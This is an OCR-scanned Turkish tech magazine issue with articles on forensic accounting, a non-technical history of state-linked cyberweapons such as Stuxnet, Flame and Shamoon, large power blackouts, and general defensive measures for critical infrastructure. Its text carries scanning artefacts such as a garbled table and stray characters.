hasabe gibi birçok bilim dallarının içinde 
olduğu araştırma soruşturma sonuç topla- 
ma bilim dalıdır 





Adli Muhasebede Yapılan Hileler Nelerdir? 


#İşletme çalışanları tarafından işletmelerine karşı 
yapılan hileler 

#Beyaz yakalılar tarafından işlenen suçlar 
#İşletme tepe yöneticilerinin işletme ilgililerini ya- 
nıltmaya yönelik olarak yaptıkları mali tablo hileleri 
#Yatırımlarla ilgili hileler 

#Ticari rüşvetler ve komisyonlar 

#Banka işlemleri ile ilgili hileler 

#Elektronik fon transferleri ile ilgili hileler 
#Bilgisayar hileleri 

#İnternet yoluyla yapılan hileler 


Adli Muhasabecinin Beklenen Görevler Nelerdir? 


#Şüphe duyulan hileli işi kanıtlarıyla birlikte ortaya 
çıkarmak 
#Verilen zararın boyutlarını hesaplamak 


Adlı Muhasebe Nedir? 


www.cyber-warrior.org 





#Hilenin yapılmasını önleyici ve caydırıcı önlemlerin 
alınmasını sağlamaktır 


Adli Muhasebecinin Taşıması Gereken Özellikler 
Nelerdir? 


#Yoğun bir muhasebe bilgisi 
#Hukuk 

#Denetim 

#İşletme yönetimi 
#Psikoloji 

#Suç bilimi 

#Bilgisayar uygulamaları 


Türkiyedeki Gelişimi Nedir? 


Küreselleşme ile birlikte tüm dünya pazarlarının yo- 
gun bir rekabet ortamı içinde olması özellikle 
sermaye piyasalarındaki şirketleri paniğe sürükle- 
mektedir. Şirketler en iyi olma yarışı içerisindeyken 
pek çok zaman çeşitli hile, yolsuzluk veya manipü- 
lasyonlara başvurabilmektedirler. Gelişen teknoloji 
de bu konuda şirketlerin en önemli yardımcısıdır. 
Özellikle 21. yüzyılda yaşanan küresel etkili şirket 
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ve denetim skandalları mevcut deetim sistemlerinin 
yetersizliğini kanıtlamış ve tüm denetim uygulamala- 
rına yeniden yön verilmeye başlanmıştır. Bu süreçte 
yaşanan en önemli gelişmelerden biri de adli muha- 
sebe kavramının ortaya çıkmasıdır. 

Adli muhasebe, hukuk ve muhasebe bilimleri arasın- 
da bir köprü görevi üstlenerek daha çok işletmelerde 
yaşanan hile ve yolsuzlukların tespit edilmesi, önlen- 
mesi ve caydırılması ile hile ve yolsuzluklara ilişkin 
başlatılan hukuksal süreçte etkin bir rol üstlenmek- 
tedir. Adli muhasebe, başta muhasebe, denetim ve 
hukuk olmak üzere istatistik, matematik, bilgi tek- 
nolojileri, psikoloji gibi pek çok bilim dalında bilgi 
ve yetenek sahibi olmayı gerektirdiğinden hile ve 
yolsuzluklarla mücadelede önemli bir araçtır. Adli 
muhasebenin bu önemi doğrultusunda bu çalışma- 
da öncelikle adli muhasebecilik mesleğine yönelik 
açıklamalar yapılarak mesleğin ülkemizdeki mevcut 
durumu incelenmiştir. Daha sonra Yeminli Mali Mü- 
şavirlik Şirketleri ve Sermaye Piyasasında Bağımsız 
Denetimle Yetkili Kuruluşların bakış açılarıyla Tür- 
kiyede adli muhasebecilik mesleğinin gelişimine yö- 
nelik önerileri SPSS 17.0 paket programı aracılığı ile 
analiz edilerek değerlendirilmiştir. Analiz sonucunda 
ülkemizde mevcut denetim sisteminin, adli muha- 
sebe için gerekli alt yapının ve eğitim sisteminin ye- 
tersiz olduğu tespit edilmiş ve mesleğin gelişimi için 
yapılması gereken faaliyetler değerlendirilmiştir. 





Kritik Altyapıları Hedef Alan 
Siber Silahlar 


Kurumları Hedef Alan Siber Silahlar; 
- Stuxnet 

- Night Dragon 

- Flame 

- Dugu 

- Gauss 

- Shamoon 

Kritik Altyapılara Yönelik Siber Saldırı Örnekleri; 
Büyük Çaplı Elektrik Kesintileri; 

- ABD ve Kanada Elektrik Kesintisi 

- Hindistan Elektrik Kesintisi 


- Türkiye Elektrik Kesintisi 





Kritik Altyapıların Siber Güvenliği Kapsamında Alı- 
nabilecek Önlemler 
Kurumları Hedef Alan Siber Silahlar 


1. Stuxnet 


Bir solucan yazılımı olan Stuxnet'in, Amerika”, 


cc 


Ais ilddlel Melis 





nülmekte olup, İran'ın nükleer faaliyetlerini sekteye 
uğratmak için kullanıldığı bilinmektedir. Bu yazılım, 
endüstriyel kontrol sistemlerini hedefleyen ve çalış- 
ma düzenlerini engellemek amacıyla yapılan ilk siber 
silah tehdidi olarak bilinmektedir. İran'ın nükleer 
program kapsamında inşa ettiği Natanzdaki nükleer 
tesise yönelik uzun bir süredir siber saldırı gerçek- 
leştiren ve 2010 yılında tespit edilen Stuxnet silahı, 
nükleer santrifüjlerin hasara uğramasına neden ol- 
muştur. Devletinde desteklemiş olduğu bir operasyon 
kapsamında yürütülen saldırının sadece İran'ı hedef 


aldığı bilinmektedir. 


Bu solucan yazılımı Stuxnet, siber silahlar arasında 
haberlere ve çeşitli yayınlara en çok konu olan hedef 
odaklı saldırıdır. Bugün bilindiği kadarıyla Stuxnet 
operasyonu, Kasım 2005'te ilgili sistemdeki Komu- 
ta-Kontrol sunucularının incelenmesi sonucu kısmen 
fark edilmiştir. 


Ancak burada sadece anormal bir işleyişin varlığı söz 
konusudur. Bu tehdidin mekanizması ve işlevleriyle 
ilgili kapsamlı tespit işlemleri ise bundan 5 yıl sonra, 
Temmuz 2010'da yapılmıştır. Bu durumun nedeni ise: 


“Stuxnet solucanının kendisini bu zamana kadar giz- 
lemeyi başarmasından kaynaklanmaktadır.” Stuxnet 
solucanı sıradan bir solucan ya 
da virüsten farklı olarak spe- 
sifik amaçlı oluşturulmuştur 
ve yalnızca “Siemens Step7” 
sistemini hedef almıştır. 


Stuxnetin en muhtemel sızma 
yöntemi ise "USB Flash Bel- 
lekler” aracılığıyla hedefe etki 
etmesi olarak değerlendiril- 
mektedir. Solucan, internetten 
izole edilmiş, dışarıdan giril- 
mesi mümkün olmayan ağlara 
da bulaşmıştır. 


Bunun sonucunda ise bilgisayarlarda dahil olmak 
üzere 155 ülkede yaklaşık olarak 40.000'den fazla 
cihaza sızdığı tespit edilmiştir. 


İsrail” ve “Hollanda” tarafından imi ww 
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2. Night Dragon 


Stuxnet solucan operasyonundan sonra 2009 yılında 
üretilip yayıldığı düşünülen Night Dragon, çoğun- 
lukla küresel petrol ve enerji şirketlerine karşı ko- 
ordine edilmiş bir silah olarak nitelendiriliyor. Bazı 
kamu kurumlarını da hedef alan bu saldırı çoğunluk- 
la Windows işletim sistemlerinde bulunan birtakım 
güvenlik açıklarından yararlanmak suretiyle bilgisa- 
yarlarda erişim hakkı elde etmek için gerçekleştiri- 
liyordu. Kazanılan erişim hakkı ile bilgisayarlardaki 
petrol ve gaz üretim sistemlerinin bilgileri ve şirket- 
lere ait finansal dökümanlar ele geçirilmiştir. 


Güvenlik araştırmacılarının Night Dragon olarak ad- 
landırdığı bu gelişmiş saldırı yönteminde kullanılan 
araçların, tekniklerin ve ağ faaliyetlerinin Çin Dev- 
leti kaynaklı olarak belirlendiği ifade edilmektedir. 
Kullanılan saldırı araçlarının Windows oturum açma 
isteklerini engelleyen ve kullanıcı adlarını ve parola- 
ları ele geçiren araçlar olduğu tespit edilmiştir. 


McAfee şirketi hedeflenen kuruluşlardan hassas ve- 
rileri ele geçirmek için tasarlanmış önemli bir saldırı 
dizisini ortaya çıkarmıştı. Daha sonra bu saldırılara 
Night Dragon adını vermişlerdi. Night Dragon saldı- 
rıları, sosyal mühendislik, hedef kimlik avı, Windows 
işletim sistemindeki güvenlik açığı suistimalleri, Ac- 
tive Directory güvenlik ihlalleri ve Uzaktan Yönetim 
Araçlarını yani RAT”ları içeren koordineli, gizli ve 
hedefli siber saldırılar kullanmaktadır. Bkz 


5 
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3. Flame / Flamer / SkyWiber 


İlk olarak 2010 yılında aktif olan ve 2012 yılında “Sk- 
yWiper” adıyla tespit edilen “Flame” ya da Flamer, 
Stuxnete benzeyen fakat çok daha karmaşık ve güçlü 
bir siber silah olarak tanımlanmaktadır. Karmaşık 
bir yazılım olarak Flame, belirli bir aktör tarafın- 

dan değil birden fazla aktörün dahil olması sonucu 
oluşmuştur. Bu sebeple bugüne kadar tespit edilen en 
komplike yazılım olarak ifade edilmektedir. Stux- 
netten farklı olarak hedefe zarar verme değil, hedef- 
ten bilgi alma amaçlı oluşturulmuştur. Ancak Stuxnet 
virüsünden 20 kat daha karmaşık bir kodla yazıl- 
mıştır. İlk olarak İranda keşfedilen bu silah, Doğu 
Avrupa ve Ortadoğu ülkelerinde de tespit edilmiştir. 
Çoğunlukla devlet kurumlarını hedef alan Flame'in 
kaynağı hakkında net bir bilgi elde edilememiştir 
ancak tıpkı Stuxnet gibi devlet destekli bir operasyon 
kapsamında yürütüldüğüne dair bilgiler mevcuttur. 


Bu yazılıma ait ilginç bir özellik ise tüm modülleri ile 
birlikte yaklaşık 20 Megabayt civarında bir büyük- 
lükte olmasıdır. Flame ile Stuxnet ve Dugu arasında 
çok güçlü bir bağ kurulamasa da genel kod yapısı ve 
fonksiyonları benzerlik göstermektedir. Bu neden- 
le Stuxnet ve Dugu saldırılarını gerçekleştiren aynı 
saldırganlar değil fakat işbirliğinde olan saldırganla- 
rın yaptığı tahmin edilmektedir. Büyük ve karmaşık 
bir yapıya sahip olan Flame malware yazılımı USB 
flash belleklerle yerel ağlarda yayılması için tasarlan- 
mıştır. Kendini çoğaltma yeteneği olmayan malware 
için saldırgan “Yazıcı Kuyruğu ve Windows Shell” 
açığını kullanarak başka bilgisayarları etkilemesini 
sağlayabilmektedir. Flame saldırısında C C sunucu 
için 80'den fazla domain kullanılmış olup şifreleme 
tekniği olarak XOR şifreleme ve RC4 algoritmaları 
kullanılmıştır. 


Flame Virüsünün bilginin sızdırılabilmesi için mo- 
nitör, klavye, depolama cihazları, mikrofon, USB, 
Bluetooth ve Wi-Fi gibi her türlü sistem işlemcilerini 
ve donanımını kullanabildiği Budapeştede bulunan 
bir Kriptografi ve Sistem Güvenliği Laboratuvarı 
“CrySyS Lab” tarafından yapılan araştırma sonucu 
ortaya konulmuştur. Flame Virüsünü yönlendirmek 
için virüsün arkasında bulunan kişiler tarafından 
kontrol ve komutası çok sık değişen bir ağ kullanıl- 
mıştır. İran, İsrail, Mısır, Suriye, Batı Şeria, Lübnan, 
Sudan ve Suudi Arabistan virüsten etkilenen bölgeler 
arasında gösterilmektedir. Flame virüsü, siber casus- 
luk amacı ile geliştirilen en güçlü siber silahlardan 





birisidir. 





4. Dugu 


2011 yılında keşfedilen Dugu Şubat 2010'dan beri 
aktif olduğu tahmin ediliyor. Stuxnet ve Flame yazı- 
lımlarının bir benzerini içerdiği belirtilen Dugu'nun 
Stuxnet'i oluşturan tehdit aktörleri tarafından veya 
Stuxnetin kaynak koduna erişimi olanlar tarafından 
yazıldığı tespit edilmiştir. Dugu'nun Stuxnet'ten fark- 
lı olarak amacının, hedef sistemden veri elde etmek 
olduğu ifade edilmektedir. Ayrıca diğer amacının da 
gelecekte başka bir üçüncü tarafa karşı daha kolay 
bir saldırı gerçekleştirmek için endüstriyel altyapı ve 
sistem üreticileri gibi kuruluşlardan istihbarat veri- 
lerini ve varlıkları toplamak olduğu belirtilmektedir. 
Dugu'nun Avrupa ve Ortadoğudaki yaklaşık 12 ül- 
keden çeşitli organizasyonları hedef aldığı bilinmek- 
tedir ve tıpkı Stuxnet ve Flame gibi devlet destekli bir 
operasyon kapsamında kullanıldığına dair iddialar 
söz konusudur. Hedefinde ise İran, Sudan, Fransa ve 
Macaristan bulunmaktadır. 


Dugu virüsü Stuxnet virüsünden farklı olarak SCA- 
DA sistemleri ile ilgili kritik bilgileri toplamak için 
tasarlanmıştır. 36 gün sonra virüs eriştiği sistemden 
kendisini silmektedir. Dugu virüsü saldırı yapaca- 
Şınız sistemin Zayıf ve güçlü yönlerini ele geçirmek 
için SCADA sistemleri ile ilgili kritik bilgilerin tespiti 
yapmaktadır. Bu tespit ise Stuxnet benzeri saldırı 
silahlarının işini ve oluşumunu kolaylaştırmaktadır. 
Dugu saldırısında temel hedef sabotaj yerine casus- 
luk yapmaktır. Microsoft Word dosyasında bulunan 
True Type font açığından yararlanarak sıfır gün saldı- 
rısı düzenlenmiştir. Dugu yazılımı kendini çoğalt- 
mamakla birlikte saldırgan hedef aldığı bilgisayarı 
bir sonraki hedef için bir adım olarak kullanmıştır. 
Ayrıca saldırılarda keylogger yöntemi ile elde edilen 
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verilere XOR şifreleme yapılmıştır. Bahsediyor oldu- 
&umuz Dugu'nun yanı sıra bunun daha gelişmiş bir 
versiyonu olan Dugu 2.0 da bulunmaktadır... 


5. Gauss 


2011 yılında tespit edilen siber silah araçlarından 
olan Gauss diğer yazılımlardan farklı olarak bankala- 
rı etkilemesidir. Siber bir tehdit olan virüs çevrimiçi 
bankacılık hesaplarını izlemiştir. Virüs, etkisine aldı- 
$ı bilgisayarlarda bulunan çevrimiçi bankacılık hesap 
kimlik bilgileri, hassas verileri ve tarayıcı parolalarını 
ele geçirmek için tasarlanmıştır. 


Flame ile benzer yapıda bileşenlere sahip olan Ga- 
uss'un, bilinmeyen bir saldırı aracı taşıyan Trojan 
olarak çalıştığı ve devlet destekli bir operasyon 
kapsamında yürütüldüğü tespit edilmiştir. Gauss, 
Stuxnet, Flame ve Dugu'nun aksine kurumları veya 
belirli bir sektörü hedeflememiştir. Spesifik anlamda 
belirli şahısları üst düzey bir siber casusluk operasyo- 
nu kapsamında hedeflemiştir. Bunu da ilgili hedefin 
sisteminden veri ele geçirme yoluyla yapmıştır. Ga- 
uss'un Stuxnet, Dugu ve Flame'i üreten aynı aktörler 
tarafından oluşturulduğuna dair önemli kanıtların 
olduğu da bilinmektedir. Gauss'un Windows sistem - 
lerinden çeşitli verileri ele geçirmenin yanı sıra, bazı 
sistemlerde etkinleşen bilinmeyen şifrelenmiş bir 
yük de içerdiği görülmüştür. Tıpkı Dugu'nun Stux- 
net platformuna dayandığı gibi, Gauss'un da Flame 
platformuna dayandığı söylenmektedir. Toplamda 
2,500'den fazla sisteme bulaştığı tespit edilen Ga- 
uss'un çoğunlukla Ortadoğu ülkelerini hedef aldığı 
teknik dokümanlarda belirtilmiştir. 


6. Shamoon 


2012 yılında, son derece yıkıcı etkiye sahip bir siber 
saldırı olarak değerlendirilen Shamoon virüsün orta- 
ya koyulmasındaki amaç enerji sektörünü hedef al- 
mak olmuştur. Virüs işleme mantığı bulaştığı sistem- 
lere zarar vermek ve bilgisayarları kullanılamaz hale 
getirmek olmuştur. 2012 yılında Suudi Arabistan'ın 
Aramco adlı ulusal petrol şirketine yapılan bir siber 
saldırı ile varlığı anlaşılmıştır. Saldırı Arabistan'ın en 
büyük petrol rafinerisinde yaklaşık 30.000 bilgisaya- 
rı etkilemiştir. Yapılan saldırılar ile petrol şirketine 
ekonomik olarak zarara sebebiyet vermiştir. 


W32.Disk Track olarak da bilinen bu saldırıda kul- 
lanılan kötü amaçlı yazılım, diğer tüm siber silahlara 
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göre farklı bir çalışma mantığına sahiptir. Buna göre 
Shamoon, öncelikle sızdığı sistemde gerekli tüm dos- 
yaları oluşturmakta, eski dosyaları silmekte ve son 
olarak gerekli verileri yöneticiye gizlice iletmektedir. 


Bu süreç tespit edilmeden aylarca sürmüştür. Shamo- 
on son olarak işlemleri bitirince sızdığı sistemde bo- 
zulmalara ve kesintilere neden olmaktadır. Stuxnet, 
Dugu ve Flame gibi silahlara nazaran Shamoon'un 
halen aktif olarak çalıştığı düşünülmektedir. Çünkü 
2016 yılında ve 2018 yılında Orta Doğudaki hedefle- 
re karşı yeni bir saldırı dalgasıyla Shamoon yeniden 
tespit edilmişti. Bu son iki Shamoon saldırıları ilk 
varyanta göre daha etkili saldırılar olarak değerlendi- 
rilmektedir. 





Kritik Altyapılara Yönelik Siber Saldırı Örnekleri 


Büyük Çaplı Elektrik Kesintileri Üzerine Araştırma 


Elektrik altyapısı, kritik altyapılar arasında çok 
önemli bir konuma sahiptir. Elektrik dağıtım altyapı- 
sı incelendiğinde; üretim tesisleri, iletim hatları, trafo 
merkezleri, iletim ve dağıtım trafoları, ulusal/bölgesel 
ve yerel kontrol merkezleri, uzak uç birimleri, akıllı 
elektronik cihazlar ve iletişim hatları gibi farklı birim 
ve tesisler görülmektedir. Bu kontrol merkezleri, 
devre kesici, sigorta anahtarı, trafo ve röle gibi güç 
sistemi unsurlarını arayüzler ve izleme sensörleri 
marifetiyle komuta eden, geniş ağlarla bağlantılı 
özelleştirilmiş uzak uç birimleri ve akıllı elektronik 
cihazlarına bağlı SCADA sistemleri ile ilişkilidirler. 


Elektrik altyapı sistemi üst düzeyde dinamik, karşı- 
lıklı bağlantılarla hizmet veren, resmi ve özel sektöre 
ait unsurların iç içe olduğu karmaşık bir yapıdır. 


Siber saldırı ihtimali göz ardı edildiğinde dahi; göz- 
lem ve kontrol işlevlerinin yerine getirildiği SCA- 
DA-ICS sistemlerinde meydana gelen aksaklıklar, 


cihazlardan kaynaklanan arızalar, kullanıcı hataları 
ve çevresel etkenlerden dolayı sık sık kesintiye uğra- 
yan elektrik altyapısı, bunların çok azında uzun süreli 
ve büyük çapta zararlara neden olmaktadır. 


1. ABD ve Kanada Elektrik Kesintisi 
Tarih 2003... 


14 Ağustos 2003 tarihinde Kanada'nın Ontario eyale- 
ti ve ABD'nin bazı eyaletlerinde (Michigan, Pennsy- 
İvania, New York...) elektrik kesintisi meydana gel- 
miştir. Bu kesintiden 50 milyon insan etkilenmiştir. 
Kesinti Amerika tarihinin en büyük elektrik kesintisi 
olarak karşımıza çıkmaktadır. 


Ontario eyaletinde bir haftadan fazla süren kesin- 

ti ABD eyaletlerinde 4 gün sürmüştür. Bu süreçte 
kesintinin yalnızca Amerikaya maliyeti 4-10 milyar 
dolar olduğu belirtilmektedir. Ontarioda ise üretimin 
aksamasından kaynaklanan zararın yaklaşık 2,3 mil- 
yar Kanada doları olduğu tahmin ediliyor. Elektrik 
kesintisi kritik sektörlerde faaliyet gösteren pek çok 
büyük şirketin işlemlerinin durmasına neden olmuş- 
tur. 


Elektrik Kesintisi Sonucunda; 


* General Motors, Ford, Honda gibi dev şirketlerin 
olduğu otomobil ve motor üretim tesislerinden en az 
70 tanesi faaliyetlerini kesinti süresince durdurmuş- 
tur. Bu süreçte yaklaşık 100000 çalışan işlerine gide- 
memiştir. 8 petrol rafinerisi kesintiden etkilenmiştir. 
Üretim kaybı nedeniyle bazı eyaletlerde yakıt sıkıntısı 
yaşanmıştır. 


* Özellikle Ontario eyaletinde kümelenmiş durum - 
daki kimyasal petrokimyasal tesisler kesintiyle birlik- 
te süreçlerinde aksaklıklar yaşamışlardır. Geniş çaplı 
bir alanda çevresel zarara neden olan bu aksaklıklar 
aynı zamanda saat başı 10 ila 20 milyon dolar arasın- 
da kayba yol açmıştır. 


* Trafik ışıklarının çalışmaması ile büyük kentlerde 
önemli aksaklıklar yaşanmıştır. Birçok şehirde havaa- 
lanları hizmetlerine ara vermiştir. Gıda ve tarım sek- 
törüne ait kayıpların yaklaşık I milyar dolar olduğu 
tahmin edilmektedir. Soğuk zincir ve gıda tedarikçi- 
leri büyük zarara uğramışlardır. Yine aynı şekilde ilaç 
şirketleri, bankalar, marketler, gibi yerler hizmetlerini 
durdurmak zorunda kalmışlardır. 


* Telefon altyapısı elektriğe ihtiyaç duyduğundan 
kesintinin ilk anından itibaren telefonlar kullanı- 
lamamıştır. Cep telefonları ise yoğunluk nedeniyle 
kullanılamaz duruma gelmiştir. 


New York eyaletinde sahne sanatlarının merkezi ko- 
numunda bulunan Broadway'in kesinti boyunca ara 
vermek zorunda kaldığı gösterilerindeki maddi kaybı 
I milyon dolar civarındadır. 


Kesintinin ardından Amerika ve Kanada tarafından 
ortak olarak sürdürülen araştırmalar sonrasında 
kesintinin sebeplerine ve alınacak önlemlere dair de- 
taylı bir rapor yayınlanmıştır. Bu rapora göre kesinti 
birden fazla aksaklığın ve hatanın üst üste gelmesi so- 
nucunda oluşmuştur. İlgili elektrik işletmesinin “First 
Energy” voltaj düzensizlikleri karşısında gerekli 
önlemleri almayışı, sistemin yetersizliklerini zama- 
nında fark edemeyerek müdahale etmemesi ve olay 
sonrasında gerekli devir ve düzenlemeleri yapmama- 
sı kesintinin temel nedenleri olarak sıralanmıştır. 


Kesintiye neden olan olayların başlangıç noktasının 
siber tabanlı bir kontrol sisteminin hatalı bir ve- 
ri-girdi nedeniyle arızalanması ve hemen ardından 
arızalanan sistemin ve komşu kontrol bölgelerinin 
anlık durumlarının da takip edilemeyişi siber saldırı 
ihtimalinin kuvvetlenmesine neden olmuştur. 


2. Hindistan Elektrik Kesintisi 


2 Ocak 2001 tarihinde şebekelerdeki düşük elektrik 
miktarı ve yüksek talep yüzünden meydana gelen 
elektrik kesintisi etkilediği insan sayısı açısından o 
tarihe kadar tarihteki en büyük kesinti olma özelliği- 
ni taşımıştır. 230 milyon insanı etkileyen ve yaklaşık 
107 milyon dolar zarara neden olmuştur. Bu olaydan 
yaklaşık 10 yıl sonra 31 Temmuz 2012de yine Hin- 
distanda meydana gelen ve dünya nüfusunun yakla- 
şık 9010'u olan 680 milyon insanın etkilendiği elekt- 
rik kesintisi halen tarihteki en büyük kesinti olma 
özelliğini sürdürmektedir. Etkilenen nüfus verisinin; 
kesintinin yaşandığı coğrafi alan üzerinde yaşayan 
insan sayısı esas alınarak belirlendiği özellikle belir- 
tilmelidir. Çünkü etkilenen alanda yaşayan insanların 
yarısına yakınının 323 milyon” elektrik hizmetine 
erişimi bulunmamaktadır. 


30 Temmuz 2012'de nispeten daha küçük çapta ül- 
kenin kuzey bölgesinde yaşanan elektrik kesintisinin 
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ardından bir gün sonra meydana gelen büyük kesinti 
ile ilgili olarak sorumlu bakanlık tarafından yapılan 
ilk açıklamalarda Hindistan'ın kuzey bölgelerinde 
sıcak hava nedeniyle aşırı yüklenmenin oluştuğu ve 
bunun ülkenin kuzey, batı ve kuzeybatı bölgesinde 
kesintiye neden olduğu belirtilmiştir. Ancak uzman- 
lar kesintinin temel nedeninin yetersiz yatırımlardan, 
ülke yönetiminin hatalı enerji politikalarından kay- 
naklandığını belirterek, yaşanan olayın belirtilerinin 
yıllardır ihmal edildiğini vurgulamaktadırlar. 


Hindistan'ın 28 eyaletinin 20'sini kapsayan kesintinin 
gerçekleşmesiyle birlikte tren seferleri durmuş, ma- 
denlerde çalışanlar mahsur kalmış, pek çok hastane 
ve tesis kapanmıştır. Suların da kesilmesi ile günlük 
yaşantıda önemli aksaklıklar yaşanmıştır. Büyük sa- 
nayi şirketleri ve havaalanları sahip oldukları jenera- 
törler sayesinde işlevlerini sürdürebilmişlerdir. 


3. Türkiye Elektrik Kesintisi 


31 Mart 2015 tarihinde Türkiyede yaşanan elektrik 
kesintisi henüz nedeni tam olarak bilinmemektedir. 
Üretilen elektriğin üretim santrallerinden dağıtım 
noktalarına ulaştırılmasını sağlayan ve birbirinin 
alternatifi olarak planlanan üç iletim hattının sali- 
seler içinde arıza yapması sonucu meydana gelen 
elektrik kesintisi sabah saatlerin başlamış, akşam 
21:00 itibariyle tüm ülke genelinde elektrik kullanımı 
sağlanmıştır. Yaşanan elektrik kesintisine dair kayıt- 
lar incelendiğinde 5 saat 22 dakika 16 saniye enter- 
konnekte iletim sistemi tamamen devre dışı kalmış- 
tır. Bu saniyeden itibaren santraller devreye alınarak 
elektrik verilmeye başlanmıştır. Bu işlem sırasında 
kritik altyapılar kapsamında faaliyet gösteren tesis ve 
sistemler öncelikli olarak değerlendirilmişlerdir. 


Kesintiyle birlikte şehirlerde metro ve elektrikli tren 
seferleri durmuştur. Trafik ışıklarının devre dışı 
kalmasıyla İstanbul başta olmak üzere ulaşım büyük 
ölçüde aksamıştır. Büyük hastanelerde acil servis ve 
yoğun bakım üniteleri dışında sağlık hizmeti veril- 
memiş, okullar ve devlet kurumlarının birçoğunun 
hizmetleri aksamış ve çalışanlar evlerine gönderil- 
mişlerdir. Otomotiv ve tekstil gibi önemli üretim sek- 
törlerinde faaliyetler bir vardiya süresince durduru- 
lurken Ankara Sanayi Odası zararın ilk belirlemelere 
göre 800 milyon dolara ulaştığını belirtmiştir. 


Türkiye çapında yaşanan elektrik kesintisinin teknik 
incelemeleri halen devam etmektedir. Buna paralel 


|İCWBEST GÜNCEL BİLİM VE TEKNOLOJİ DERGİSİ 





olarak ekonomik sonuçlarına yönelik resmi bir araş- 
tırma ya da rapor henüz hazırlanmamıştır. Bu çalış- 
maların tamamlanabilmesi için dünyadaki örneklerle 
karşılaştırıldığında zamana ihtiyaç olduğu değer- 
lendirilebilir. Ancak buna rağmen eldeki mevcut 
bilgiler ve yapılan açıklamalar sonucunda kesintinin 
temel nedeninin siber saldırı olma olasılığının çok az 
olduğu değerlendirilmektedir. Siber saldırı ihtimali 
olmasa dahi, tıpkı ABD ve Hindistan örneklerinde 
olduğu gibi elektrik alt yapısında meydana gelebile- 
cek bir aksaklığın ulusal güvenlik, toplum refahı ve 
ekonomik anlamda nelere mal olabileceği konusuna 
vurgu yapılmaya çalışılmıştır. Bununla beraber sis- 
tem yöneticilerinin bu olaydan dersler çıkartmaları 
ve tedbirlerini gözden geçirmeleri gerekmektedir. 


Gerçekleştiği Etkilenen İnsan | Kesintinin 
Yer Sayısı üresi 
6-14 saat 
8 saat 


02 Ocak 2001 Hindistan 230 milyon 12 saat 


01 Kasım 2014 Bangladeş 150 milyon 10-12 saat 
26 Ocak 2015 140 milyon 


Kesintinin Tarihi 


30 Temmuz 201? 
31 Temmuz 2012 


18 Ağustos 2005 


(Mart 1999 o İBreziiya o o |97miiyon oo /(4saat > | 


Java - Bali 100 milyon 


10-11 Kasım 2009 ilyon i saat 


31 Mart 2015 
28 Eylül 2003 


14 Ağustos 2003 |ABD - Kanada 50 mi d4-f gün 





Kritik Altyapıların Siber Güvenliği Kapsamında Alı- 
nabilecek Önlemler 


“Değerlendirme- Analiz, * 
>» cc 


“Azaltma” 
dırma” 


İyileştirme”, © 
>» cc 


Saldırı Sonrası Tepki” 


Uyarılar”, 
Yeniden Yapılan- 


Kritik altyapı sistemlerinin karşı karşıya olduğu en 
önemli güvenlik problemlerinden bazıları: 


Artan bağlantı sayısı, karşılıklı bağımlılık, karmaşık 
yapı ve sistem erişilebilirliğinin kesintisiz olma zo- 
runluluğudur. Bu problemlerin etkilerinin nispeten 
azaltılabilmesi amacıyla sistemlerin sürekli güncel 
kalması ve yeni tehditleri tanıyabilmeleri mümkün 
kılınmalıdır. Temel amaç ise sistemlerin korunma- 
sı yerine saldırılara karşı dirençli ve kendi kendini 
iyileştirebilir olmasını sağlamak olmalıdır. 


Analiz ve Değerlendirme: Kritik altyapı korunması- 
nın en temel ve en önemli aşamasıdır diyebiliriz. Bu 
aşamada; sistem içerisindeki birim ve fonksiyonların 





kritiklik dereceleri, zafiyetleri, karşılıklı bağlantıları, 
konfigürasyonları ve temel özellikleri ortaya konur. 
Daha sonra ise sistemin zarar görmesi ya da çökmesi 
durumunda ortaya çıkacak etki belirlenir. Bunun için 
testler, taramalar ve tatbikatlar yapılmaktadır. 


İyileştirme: Kritik altyapı, birim ve fonksiyonlarında 
zarara neden olabilecek bilinen zafiyetlerin herhangi 
bir tahribat meydana gelmeden önce önlemler alın- 
masıdır. 


Belirtiler ve Uyarılar: Sistem içerisindeki birim ve 
fonksiyonların izlenmesini, oluşabilecek belirti ve 
uyarıların rapor edilmesini kapsayan aşamadır. 
Belirtiler altyapı bünyesinde bir aksaklık olup olma- 
yacağına dair gerekli ipuçları veren olaylardır ve her 
seviyede gözlemlenmektedir. 


Azaltma: Kritik birim ve fonksiyonların kaybı ya 

da zayıflaması durumunda oluşacak etkiyi azaltma 
çalışmalarını içeren aşamadır. Saldırı öncesinde ve 
saldırı esnasında altyapı hizmet sağlayıcıları, sektörel 
uzmanlar, askeri birimler ve kamuya ait savunma 
birimleri tarafından yürütülürler. 


Saldırı Sonrası Tepki: Olay sonrasında saldırı kay- 
nağını saf dışı bırakmaya yönelik plan ve faaliyetleri 
içermektedir. Son aşama ise “Yeniden Yapılandırma” 
aşaması olup zarar görmüş altyapıları normale dön- 
dürme çalışmalarını içerir. 


# Sistem üzerindeki tüm ağların tanımlanması: mo- 
dem bağlantıları, yerel ağlar, iş ortakları ile bağlan- 
tılar, internet, kablosuz ağlar, uydu bağlantıları ayrı 
ayrı değerlendirilmelidir. Gereksiz ağ bağlantılarının 
iptal edilmesi: siber güvenliğin üst düzeyde sağlana- 
bilmesi için sistem mümkün olduğunca ağ bağlantı- 
larından arındırılmalıdır. 


# Kalan ağların değerlendirilmesi ve güçlendirilmesi: 
sızma testleri ve hassasiyet analizleri ile kalan ağların 
durumu tespit edilmeli, tüm giriş noktaları güven- 
lik duvarları, sızma tespit sistemleri ve diğer gerekli 
güvenlik araçları ile güçlendirilmelidir. 


# Sistem içindeki gereksiz hizmetlerin devre dışı 
bırakılması: Doğrudan saldırıların engellenmesi için 
hali hazırda ticari veya açık kaynak yazılımları ile 
tasarlanmış olan sistemlerin risk değerlendirmesi ya- 
pılmamış, kullanılmayan veya arka planda bekletilen 
hizmet bağlantıları kesilmelidir. 





# Siber güvenlik ihtiyaçlarının açık bir şekilde tanım- 
lanması: tüm çalışanların siber güvenlik kapsamın- 
da görev tanımlamaları ve sorumlulukları ile hata 
sonucunda karşılaşacakları sonuçlar belirlenmelidir. 
Kriz durumunda yapılması gerekenler ve işlem süreç- 
lerinde gerekli uyarılar tekrar edilmelidir. 


# Sistem yedeklemesinin ve acil durum planlarının 
yapılması: acil durum tatbikatları ve sistem yedek- 
lemeleri, personelin aşinalığını arttırmak ve yapılan 
hataların tekrar edilmemesine yönelik tedbirler 
alabilmek maksadıyla periyodik olarak gerçekleştiril!- 


melidir. 


Ais iliş Melis 











E-Posta Gönderebilen Ispanaklar 

Amerikada yaşayan bağzı bilişim insanları ıspanak 
yapraklarında sensör bulunan ve ayrıca mail gönde- 
rebilen bu bitki türünü yetiştirmişlerdir.Bu çeşitteki 
